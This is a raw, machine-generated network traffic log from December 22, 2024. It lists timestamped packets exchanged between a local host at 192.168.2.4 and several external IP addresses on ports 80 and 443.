                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.725824118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.725951910 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.726025105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.726669073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.726826906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.726897955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.727525949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.727679014 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.727750063 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.728368998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.728481054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.728554964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.729229927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.729396105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.729468107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.730093956 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.730200052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.730273962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.730916023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.731023073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.731095076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.731771946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.731882095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.731950998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.732649088 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.732729912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.732795954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.733479023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.733619928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.733686924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.734318018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.734425068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.734488964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.735169888 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.735418081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.735482931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.736049891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.736162901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.736226082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.736886024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.736996889 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.737061977 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.737706900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.737828970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.737890005 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.738549948 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.738657951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.738730907 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.739372015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.740055084 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887346983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887398958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887437105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887461901 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887487888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.887490034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.888292074 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.888314962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.888339996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.888416052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.888458014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.889134884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.889292002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.889292955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.889972925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890028000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890093088 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890820980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890870094 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890916109 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.890960932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.891689062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.891797066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.891849041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377830029 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377890110 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377914906 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377947092 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377948999 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377966881 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.377986908 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.378380060 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.378424883 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.378432035 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.386059046 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.386111975 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.386121035 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.401421070 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.401580095 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.401590109 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.569725037 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.569776058 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.569797993 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573498964 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573522091 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573542118 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573549032 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573592901 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573596954 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573607922 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:32.573643923 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:33.075783968 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:33.075819969 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:33.075835943 CET49814443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:33.075844049 CET44349814172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.054493904 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.054549932 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.054625988 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.056826115 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.056842089 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.502016068 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.502048016 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.502332926 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.503246069 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.503262043 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.514166117 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.514858961 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.634598017 CET8049824185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.634710073 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.634877920 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.635761976 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.635821104 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.754498005 CET8049824185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.270349979 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.270546913 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.297254086 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.297281027 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.297513008 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.298516035 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.298645020 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.298672915 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.298748016 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.298753977 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.730483055 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.730535984 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.732847929 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.732851982 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.733170033 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.797281981 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.797307968 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.797431946 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.970523119 CET8049824185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.972596884 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.975162983 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.975424051 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.095309019 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.095439911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.095678091 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.095691919 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.122577906 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.162671089 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.162785053 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.162905931 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163011074 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163028955 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163058996 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163075924 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163255930 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163270950 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163296938 CET49823443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.163301945 CET44349823104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.198367119 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.198398113 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.198477030 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.198796988 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.198808908 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.242800951 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.418911934 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.418993950 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.419158936 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.419522047 CET49822443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.419533968 CET44349822172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.521477938 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.521605968 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.521718979 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.522161007 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.522238970 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.412328959 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.412390947 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.413748026 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.413754940 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.414076090 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.419603109 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.419624090 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.419677019 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.420952082 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421088934 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421122074 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421176910 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421175957 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421176910 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421176910 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421206951 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421242952 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421250105 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421276093 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421278000 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421344042 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421430111 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421458960 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421504974 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421504974 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421526909 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421627045 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.541243076 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.541310072 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.541385889 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.545195103 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.545262098 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.545329094 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.546560049 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.553843975 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.555664062 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.613290071 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.613344908 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.613482952 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.613483906 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.617240906 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.617352009 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.617546082 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.625715017 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.626311064 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.628705978 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.628814936 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.628890038 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.637305975 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.637505054 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.637698889 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.646107912 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.646162033 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.646281958 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.646281958 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.654396057 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.654503107 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.654676914 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.654676914 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.662787914 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.662842035 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.663002014 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.663002968 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.671443939 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.671503067 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.671673059 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.671674013 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.678733110 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.678823948 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.679017067 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.686192989 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.686383963 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.686574936 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.693672895 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.693725109 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.693777084 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.693778038 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.700968981 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.701303005 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.742392063 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.742475986 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.772667885 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.772742987 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.773086071 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.774344921 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.774344921 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.774442911 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.805308104 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.805351973 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.805533886 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.806418896 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.806484938 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.806679010 CET4983080192.168.2.431.41.244.11
